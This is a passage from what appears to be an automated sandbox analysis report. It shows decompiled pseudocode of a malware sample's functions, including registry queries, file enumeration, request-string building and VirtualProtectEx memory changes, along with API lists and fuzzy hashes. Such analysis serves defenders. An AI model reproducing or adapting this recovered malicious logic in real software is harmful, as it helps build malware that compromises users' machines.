                        				_t46 = 0; // executed
                        				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                        				_v8 = _t26;
                        				if(_t26 < 0) {
                        					L13:
                        					return _v8;
                        				}
                        				if(_v12 == 0) {
                        					Sleep(0xc8);
                        					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                        				}
                        				if(_v8 >= _t39) {
                        					_t28 = _v12;
                        					if(_t28 != 0) {
                        						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                        						_v8 = _t31;
                        						if(_t31 >= 0) {
                        							_t46 = lstrlenW(_v16);
                        							if(_t46 != 0) {
                        								_t46 = _t46 + 1;
                        								_t48 = _t46 + _t46;
                        								_t39 = E04775C4E(_t48);
                        								if(_t39 == 0) {
                        									_v8 = 0x8007000e;
                        								} else {
                        									memcpy(_t39, _v16, _t48);
                        								}
                        								__imp__#6(_v16);
                        							}
                        						}
                        						_t32 = _v12;
                        						 *((intOrPtr*)( *_t32 + 8))(_t32);
                        					}
                        					 *_a4 = _t39;
                        					 *_a8 = _t46 + _t46;
                        				}
                        				goto L13;
                        			}

                        APIs
                        • Sleep.KERNEL32(000000C8), ref: 047759B6
                        • lstrlenW.KERNEL32(?), ref: 047759EC
                        • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 04775A0D
                        • SysFreeString.OLEAUT32(?), ref: 04775A21
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeSleepStringlstrlenmemcpy
                        • String ID:
                        • API String ID: 1198164300-0
                        • Opcode ID: 450f00ec454881c30cb6e229a057f65516881e0a9d9cc230c9258d8abf0f6962
                        • Instruction ID: ad12b21943f11b8deb79193bf56c6c768238314d4e40ffcfb62e2e724ad85872
                        • Opcode Fuzzy Hash: 450f00ec454881c30cb6e229a057f65516881e0a9d9cc230c9258d8abf0f6962
                        • Instruction Fuzzy Hash: C9213175A01209FFDB10DFA4C8889DEBBB8FF48304B518569E945E7300E730AA05CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04774A3C(void* __edx) {
                        				void* _v8;
                        				int _v12;
                        				WCHAR* _v16;
                        				void* __esi;
                        				void* _t23;
                        				intOrPtr _t24;
                        				void* _t26;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t38;
                        				intOrPtr _t42;
                        				void* _t45;
                        				void* _t50;
                        				void* _t55;
                        
                        				_t50 = __edx;
                        				_v12 = 0;
                        				_t23 = E04774380(0,  &_v8); // executed
                        				if(_t23 != 0) {
                        					_v8 = 0;
                        				}
                        				_t24 =  *0x477a2d0; // 0x96d5a8
                        				_t4 = _t24 + 0x477bd90; // 0x50e9338
                        				_t5 = _t24 + 0x477bd38; // 0x4f0053
                        				_t26 = E047730AD( &_v16, _v8, _t5, _t4); // executed
                        				_t45 = _t26;
                        				if(_t45 == 0) {
                        					StrToIntExW(_v16, 0,  &_v12);
                        					_t45 = 8;
                        					if(_v12 < _t45) {
                        						_t45 = 1;
                        						__eflags = 1;
                        					} else {
                        						_t32 =  *0x477a2d0; // 0x96d5a8
                        						_t11 = _t32 + 0x477bd84; // 0x50e932c
                        						_t48 = _t11;
                        						_t12 = _t32 + 0x477bd38; // 0x4f0053
                        						_t55 = E04774DC8(_t11, _t12, _t11);
                        						_t59 = _t55;
                        						if(_t55 != 0) {
                        							_t35 =  *0x477a2d0; // 0x96d5a8
                        							_t13 = _t35 + 0x477bdce; // 0x30314549
                        							if(E04775EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                        								_t61 =  *0x477a2b4 - 6;
                        								if( *0x477a2b4 <= 6) {
                        									_t42 =  *0x477a2d0; // 0x96d5a8
                        									_t15 = _t42 + 0x477bbda; // 0x52384549
                        									E04775EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                        								}
                        							}
                        							_t38 =  *0x477a2d0; // 0x96d5a8
                        							_t17 = _t38 + 0x477bdc8; // 0x50e9370
                        							_t18 = _t38 + 0x477bda0; // 0x680043
                        							_t45 = E047733B7(_v8, 0x80000001, _t55, _t18, _t17);
                        							HeapFree( *0x477a290, 0, _t55);
                        						}
                        					}
                        					HeapFree( *0x477a290, 0, _v16);
                        				}
                        				_t54 = _v8;
                        				if(_v8 != 0) {
                        					E04773EFA(_t54);
                        				}
                        				return _t45;
                        			}

                        APIs
                        • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9338,00000000,?,73BCF710,00000000,73BCF730), ref: 04774A8B
                        • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E9370,?,00000000,30314549,00000014,004F0053,050E932C), ref: 04774B28
                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04771BD5), ref: 04774B3A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 53e2e29b56442f0f2506961499b93b4036e5617650efab7c0c923de0b7472f6a
                        • Instruction ID: 431988fe9f443527a6dc28200c7a9f8bf25e7c90fdaa5edddd2c3915fe9ced59
                        • Opcode Fuzzy Hash: 53e2e29b56442f0f2506961499b93b4036e5617650efab7c0c923de0b7472f6a
                        • Instruction Fuzzy Hash: 0C314D72600208FEEF119BA5DD88EEE7BB8EF44304F958065E605A7261D675BE04DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0477243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                        				void* _v8;
                        				char _v48;
                        				void* __edi;
                        				intOrPtr _t22;
                        				long _t29;
                        				intOrPtr _t33;
                        				intOrPtr* _t41;
                        				void* _t42;
                        				void* _t46;
                        				intOrPtr* _t47;
                        				void* _t48;
                        				intOrPtr _t50;
                        
                        				_t42 = __ecx;
                        				_t41 = _a16;
                        				_t47 = __eax;
                        				_t22 =  *0x477a2d0; // 0x96d5a8
                        				_t2 = _t22 + 0x477b671; // 0x657a6973
                        				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                        				if( *0x477a2a4 >= 5) {
                        					_push( &_a16);
                        					_push( &_v8);
                        					_push( &_v48);
                        					_t29 = _a4;
                        					"QQSUVWh"();
                        					L5:
                        					_a4 = _t29;
                        					L6:
                        					if(_a4 != 0) {
                        						L9:
                        						 *0x477a2a4 =  *0x477a2a4 + 1;
                        						L10:
                        						return _a4;
                        					}
                        					_t49 = _a16;
                        					 *_t47 = _a16;
                        					_t48 = _v8;
                        					 *_t41 = E04773F12(_t49, _t48); // executed
                        					_t33 = E047745E6(_t46, _t48, _t49); // executed
                        					if(_t33 != 0) {
                        						 *_a8 = _t48;
                        						 *_a12 = _t33;
                        						if( *0x477a2a4 < 5) {
                        							 *0x477a2a4 =  *0x477a2a4 & 0x00000000;
                        						}
                        						goto L10;
                        					}
                        					_a4 = 0xbf;
                        					E04772813();
                        					RtlFreeHeap( *0x477a290, 0, _t48); // executed
                        					goto L9;
                        				}
                        				_t50 =  *0x477a390; // 0x50e8d6c
                        				if(RtlAllocateHeap( *0x477a290, 0, 0x800) == 0) {
                        					_a4 = 8;
                        					goto L6;
                        				}
                        				_t29 = E04776DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                        				goto L5;
                        			}

                        APIs
                        • wsprintfA.USER32 ref: 0477245E
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04772483
                          • Part of subcall function 04776DB7: GetTickCount.KERNEL32 ref: 04776DCE
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E1B
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E38
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E58
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E76
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776E99
                          • Part of subcall function 04776DB7: wsprintfA.USER32 ref: 04776EBA
                        • RtlFreeHeap.NTDLL(00000000,04771C1F,?,?,04771C1F,?), ref: 047724FD
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: wsprintf$Heap$AllocateCountFreeTick
                        • String ID:
                        • API String ID: 2794511967-0
                        • Opcode ID: 961b1ef8afc004e3f6125a5928f865adaf3fe16c9aebafb9f61d9183ae794bba
                        • Instruction ID: 4dff6126869e984c28c226faae15795e418048fbbd1672cddfda5d8644920101
                        • Opcode Fuzzy Hash: 961b1ef8afc004e3f6125a5928f865adaf3fe16c9aebafb9f61d9183ae794bba
                        • Instruction Fuzzy Hash: E0313A71600109EFEF11DF64D984ADE3BB8FB48354F908462FA15AB241E778A954CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 28%
                        			E0477274E(void* __ecx, signed char* _a4) {
                        				signed int _v8;
                        				void* _v12;
                        				void* _t13;
                        				signed short _t16;
                        				signed int _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t22;
                        				void* _t23;
                        				signed short* _t26;
                        				void* _t27;
                        				intOrPtr* _t28;
                        				void* _t30;
                        				intOrPtr* _t31;
                        
                        				_t31 = __imp__;
                        				_t23 = 0;
                        				_v8 = 1;
                        				_t28 = 0x477a380;
                        				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                        				while(1) {
                        					_t13 = E04774E9C(_a4,  &_v12); // executed
                        					if(_t13 == 0) {
                        						break;
                        					}
                        					_push(_v12);
                        					_t19 = 0xd;
                        					_t20 = E047733FA(_t19);
                        					if(_t20 == 0) {
                        						HeapFree( *0x477a290, 0, _v12);
                        						break;
                        					} else {
                        						 *_t28 = _t20;
                        						_t28 = _t28 + 4;
                        						_t23 = _t23 + 1;
                        						if(_t23 < 3) {
                        							continue;
                        						} else {
                        						}
                        					}
                        					L7:
                        					 *_t31(1);
                        					if(_v8 != 0) {
                        						_t26 =  *0x477a388; // 0x50e9c78
                        						_t16 =  *_t26 & 0x0000ffff;
                        						if(_t16 < 0x61 || _t16 > 0x7a) {
                        							_t17 = _t16 & 0x0000ffff;
                        						} else {
                        							_t17 = (_t16 & 0x0000ffff) - 0x20;
                        						}
                        						 *_t26 = _t17;
                        					}
                        					return _v8;
                        				}
                        				_v8 = _v8 & 0x00000000;
                        				goto L7;
                        			}

                        APIs
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0477276B
                          • Part of subcall function 04774E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,0477A380), ref: 04774EC7
                          • Part of subcall function 04774E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04774EE9
                          • Part of subcall function 04774E9C: memset.NTDLL ref: 04774F03
                          • Part of subcall function 04774E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04774F41
                          • Part of subcall function 04774E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04774F55
                          • Part of subcall function 04774E9C: FindCloseChangeNotification.KERNELBASE(?), ref: 04774F6C
                          • Part of subcall function 04774E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04774F78
                          • Part of subcall function 04774E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 04774FB9
                          • Part of subcall function 04774E9C: FindFirstFileA.KERNELBASE(?,?), ref: 04774FCF
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 047727B0
                          • Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
                          • Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
                          • Part of subcall function 047733FA: memset.NTDLL ref: 0477343C
                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,04773EAC,?), ref: 047727A4
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Wow64$FileHeap$AllocateEnableFindRedirectionmemset$ChangeCloseCreateFirstFreeNotificationTimelstrcatlstrlenmbstowcs
                        • String ID:
                        • API String ID: 1489712272-0
                        • Opcode ID: 7f32c56861db1cea9198d12ea8091253a0deab1cdf61f315dfdea1c05b0f33bb
                        • Instruction ID: 4d0ae9d48b700568e1c89b595b7df8b0d09316d5335707fccdbd7030a074cf78
                        • Opcode Fuzzy Hash: 7f32c56861db1cea9198d12ea8091253a0deab1cdf61f315dfdea1c05b0f33bb
                        • Instruction Fuzzy Hash: 8C11E175600208EBFF009BA5CE84BEC77BCEB04325FD040A2E601D6281D379BD91DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0477779E(void* __ecx, void* __eflags) {
                        				char _v8;
                        				void* _v12;
                        				int _v16;
                        				int _v20;
                        				intOrPtr _t15;
                        				intOrPtr _t19;
                        				long _t24;
                        				long _t29;
                        				short* _t31;
                        				short* _t34;
                        
                        				_t15 =  *0x477a2d0; // 0x96d5a8
                        				_v8 = _v8 & 0x00000000;
                        				_t3 = _t15 + 0x477ba60; // 0x4f0053
                        				_v16 = 4;
                        				_t31 = E04774C7C(__ecx, _t3);
                        				if(_t31 != 0) {
                        					_t19 =  *0x477a2d0; // 0x96d5a8
                        					_t5 = _t19 + 0x477babc; // 0x6e0049
                        					_t34 = E04774C7C(__ecx, _t5);
                        					if(_t34 != 0) {
                        						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                        						if(_t24 == 0) {
                        							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                        							if(_t29 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        							}
                        							RegCloseKey(_v12);
                        						}
                        						E04772A03(_t34);
                        					}
                        					E04772A03(_t31);
                        				}
                        				return _v8;
                        			}

                        APIs
                          • Part of subcall function 04774C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047777C1,004F0053,00000000,?), ref: 04774C85
                          • Part of subcall function 04774C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047777C1,004F0053,00000000,?), ref: 04774CAF
                          • Part of subcall function 04774C7C: memset.NTDLL ref: 04774CC3
                        • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 047777F0
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0477780C
                        • RegCloseKey.ADVAPI32(00000000), ref: 0477781D
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                        • String ID:
                        • API String ID: 830012212-0
                        • Opcode ID: 5c8a3bdb5ed2b549f412f15b74be6971aad763417de15b09c3633d4ff22c54cc
                        • Instruction ID: 72739a482003a3d3729da9fe62ad63cbf587987f8963fd4ae69cd5d32ff14a9d
                        • Opcode Fuzzy Hash: 5c8a3bdb5ed2b549f412f15b74be6971aad763417de15b09c3633d4ff22c54cc
                        • Instruction Fuzzy Hash: 8C111E72900209BBEB21DBE8DD88FEEB7BCEB44705F904459A611E7151E778FA04CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04771896(void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                        				int _v12;
                        				signed int _v16;
                        				void* _v20;
                        				signed char _v36;
                        				void* __ebx;
                        				void* _t24;
                        				intOrPtr _t27;
                        				void* _t35;
                        				signed char* _t46;
                        				void* _t52;
                        				int _t54;
                        				void* _t56;
                        				void* _t57;
                        				void* _t58;
                        
                        				_t52 = __edx;
                        				_v16 = _v16 & 0x00000000;
                        				_t46 = _a4;
                        				_t54 = ( *_t46 & 0x000000ff) + 0x110;
                        				_v12 = 0x110;
                        				_t24 = E04775C4E(_t54);
                        				_a4 = _t24;
                        				if(_t24 != 0) {
                        					memcpy(_t24,  *0x477a320, 0x110);
                        					_t27 =  *0x477a324; // 0x0
                        					_t58 = _t57 + 0xc;
                        					if(_t27 != 0) {
                        						E047775D7(_t46, _a4, 0x110, _t27, 0);
                        					}
                        					if(E04774581( &_v36) != 0) {
                        						_t35 = E047735A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                        						if(_t35 == 0) {
                        							_t56 = _v20;
                        							_v36 =  *_t46;
                        							_v16 = E0477421A(_t56, _a8, _t52, _t46, _a12);
                        							 *(_t56 + 4) = _v36;
                        							_t20 =  &(_t46[4]); // 0x8b4875fc
                        							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
                        							_t58 = _t58 + 0xc;
                        							E04772A03(_t56);
                        						}
                        					}
                        					memset(_a4, 0, _t54);
                        					E04772A03(_a4);
                        				}
                        				return _v16;
                        			}

                        APIs
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • memcpy.NTDLL(00000000,00000110,04771C1F,04771C1F,?,?,04771C1F,?,?,047724E4,?), ref: 047718CC
                        • memset.NTDLL ref: 04771942
                        • memset.NTDLL ref: 04771956
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memset$AllocateHeapmemcpy
                        • String ID:
                        • API String ID: 1529149438-0
                        • Opcode ID: 7cf46dc8815a500e9a6dec0cf2ac07b097d57019b17e8dd73477b186e21a9448
                        • Instruction ID: 7f6a504ab42bbea1b97fb15aaf2a2bed1ff561ada698b6f4551cefce253372b6
                        • Opcode Fuzzy Hash: 7cf46dc8815a500e9a6dec0cf2ac07b097d57019b17e8dd73477b186e21a9448
                        • Instruction Fuzzy Hash: 99211D71A00218ABEF11AF65CC94FEEBBB8EF08654F844065F914E6351E734EA158BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E04777471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                        				void* _v8;
                        				void* __esi;
                        				intOrPtr* _t35;
                        				void* _t40;
                        				intOrPtr* _t41;
                        				intOrPtr* _t43;
                        				intOrPtr* _t45;
                        				intOrPtr* _t50;
                        				intOrPtr* _t52;
                        				void* _t54;
                        				intOrPtr* _t55;
                        				intOrPtr* _t57;
                        				intOrPtr* _t61;
                        				intOrPtr* _t65;
                        				intOrPtr _t68;
                        				void* _t72;
                        				void* _t75;
                        				void* _t76;
                        
                        				_t55 = _a4;
                        				_t35 =  *((intOrPtr*)(_t55 + 4));
                        				_a4 = 0;
                        				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                        				if(_t76 < 0) {
                        					L18:
                        					return _t76;
                        				}
                        				_t40 = E0477344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                        				_t76 = _t40;
                        				if(_t76 >= 0) {
                        					_t61 = _a28;
                        					if(_t61 != 0 &&  *_t61 != 0) {
                        						_t52 = _v8;
                        						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                        					}
                        					if(_t76 >= 0) {
                        						_t43 =  *_t55;
                        						_t68 =  *0x477a2d0; // 0x96d5a8
                        						_t20 = _t68 + 0x477b1fc; // 0x740053
                        						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                        						if(_t76 >= 0) {
                        							_t76 = E04772986(_a4);
                        							if(_t76 >= 0) {
                        								_t65 = _a28;
                        								if(_t65 != 0 &&  *_t65 == 0) {
                        									_t50 = _a4;
                        									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                        								}
                        							}
                        						}
                        						_t45 = _a4;
                        						if(_t45 != 0) {
                        							 *((intOrPtr*)( *_t45 + 8))(_t45);
                        						}
                        						_t57 = __imp__#6;
                        						if(_a20 != 0) {
                        							 *_t57(_a20);
                        						}
                        						if(_a12 != 0) {
                        							 *_t57(_a12);
                        						}
                        					}
                        				}
                        				_t41 = _v8;
                        				 *((intOrPtr*)( *_t41 + 8))(_t41);
                        				goto L18;
                        			}






















                        APIs
                          • Part of subcall function 0477344C: SysAllocString.OLEAUT32(80000002), ref: 047734A3
                          • Part of subcall function 0477344C: SysFreeString.OLEAUT32(00000000), ref: 04773508
                        • SysFreeString.OLEAUT32(?), ref: 04777550
                        • SysFreeString.OLEAUT32(047720DE), ref: 0477755A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: String$Free$Alloc
                        • String ID:
                        • API String ID: 986138563-0
                        • Opcode ID: 507c67b61538b6b458c078057e5ceb51d8ba788e2a296a4d87c19173c316a77e
                        • Instruction ID: 671e31bf2b747678690ddf517920fe3e732d06a1f4ddffae29570ce24de23093
                        • Opcode Fuzzy Hash: 507c67b61538b6b458c078057e5ceb51d8ba788e2a296a4d87c19173c316a77e
                        • Instruction Fuzzy Hash: 0D314972600119AFCF15DF68C888C9BBB7AFFC97447948658F915AB210E631FD51CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                        				intOrPtr _t4;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t13;
                        
                        				_t13 = 1;
                        				_t4 = _a8;
                        				if(_t4 == 0) {
                        					if(InterlockedDecrement(0x477a294) == 0) {
                        						E04771547();
                        					}
                        				} else {
                        					if(_t4 == 1 && InterlockedIncrement(0x477a294) == 1) {
                        						_t10 = E04774430(_t11, _a4); // executed
                        						if(_t10 != 0) {
                        							_t13 = 0;
                        						}
                        					}
                        				}
                        				return _t13;
                        			}








                        APIs
                        • InterlockedIncrement.KERNEL32(0477A294), ref: 047741E5
                          • Part of subcall function 04774430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04774445
                        • InterlockedDecrement.KERNEL32(0477A294), ref: 04774205
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: Interlocked$CreateDecrementHeapIncrement
                        • String ID:
                        • API String ID: 3834848776-0
                        • Opcode ID: 5dd610321fcbccf148dae310b8315d7b802fb4f1ba4872fff810fa1759d88f97
                        • Instruction ID: b999ddb5ccc60e5b77d91f85ca48db0c4539ed87128ee700c6b215b320246927
                        • Opcode Fuzzy Hash: 5dd610321fcbccf148dae310b8315d7b802fb4f1ba4872fff810fa1759d88f97
                        • Instruction Fuzzy Hash: FDE04F713D412297AF211A649E08BAEA770EF41B88FC04824BB49E1350E624E861CAE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualProtectEx.KERNELBASE(000000FF,?,000030FF,00000040,6D568EE0), ref: 6C53BC44
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
                        • Instruction ID: c99ef4ebb9da80943dbb46524bd1d57d40bcbcf57b470a9b152e74a9ebbec468
                        • Opcode Fuzzy Hash: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
                        • Instruction Fuzzy Hash: DA514976B012108FDF04EE69CC917AA3BB5E74E324BDB422AE509D7761E734B448CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E04774BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                        				intOrPtr _v12;
                        				void* _v18;
                        				short _v20;
                        				intOrPtr _t15;
                        				short _t17;
                        				intOrPtr _t19;
                        				short _t23;
                        
                        				_t23 = 0;
                        				_v20 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosw");
                        				_t15 =  *0x477a2d0; // 0x96d5a8
                        				_t4 = _t15 + 0x477b394; // 0x50e893c
                        				_t20 = _t4;
                        				_t6 = _t15 + 0x477b124; // 0x650047
                        				_t17 = E04777471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                        				if(_t17 < 0) {
                        					_t23 = _t17;
                        				} else {
                        					if(_v20 != 8) {
                        						_t23 = 1;
                        					} else {
                        						_t19 = E04774C7C(_t20, _v12);
                        						if(_t19 == 0) {
                        							_t23 = 8;
                        						} else {
                        							 *_a16 = _t19;
                        						}
                        						__imp__#6(_v12);
                        					}
                        				}
                        				return _t23;
                        			}











                        APIs
                          • Part of subcall function 04777471: SysFreeString.OLEAUT32(?), ref: 04777550
                          • Part of subcall function 04774C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047777C1,004F0053,00000000,?), ref: 04774C85
                          • Part of subcall function 04774C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047777C1,004F0053,00000000,?), ref: 04774CAF
                          • Part of subcall function 04774C7C: memset.NTDLL ref: 04774CC3
                        • SysFreeString.OLEAUT32(00000000), ref: 04774C65
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File
                        Similarity
                        • API ID: FreeString$lstrlenmemcpymemset
                        • String ID:
                        • API String ID: 397948122-0
                        • Opcode ID: acddbbe763378c9a34207aad88910c8454c5eca527bb31eaaafab8208db6b8c8
                        • Instruction ID: b33946556bc3c162375b48a3dd481ee0584b6dd478bb0b1539decfb0410b4ca0
                        • Opcode Fuzzy Hash: acddbbe763378c9a34207aad88910c8454c5eca527bb31eaaafab8208db6b8c8
                        • Instruction Fuzzy Hash: EB015E32600029BBDF11AFA4CD44DAEBBB9FB44754F804625EA51E6220E370AA59D791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04775C4E(long _a4) {
                        				void* _t2;
                        
                        				_t2 = RtlAllocateHeap( *0x477a290, 0, _a4); // executed
                        				return _t2;
                        			}





                        APIs
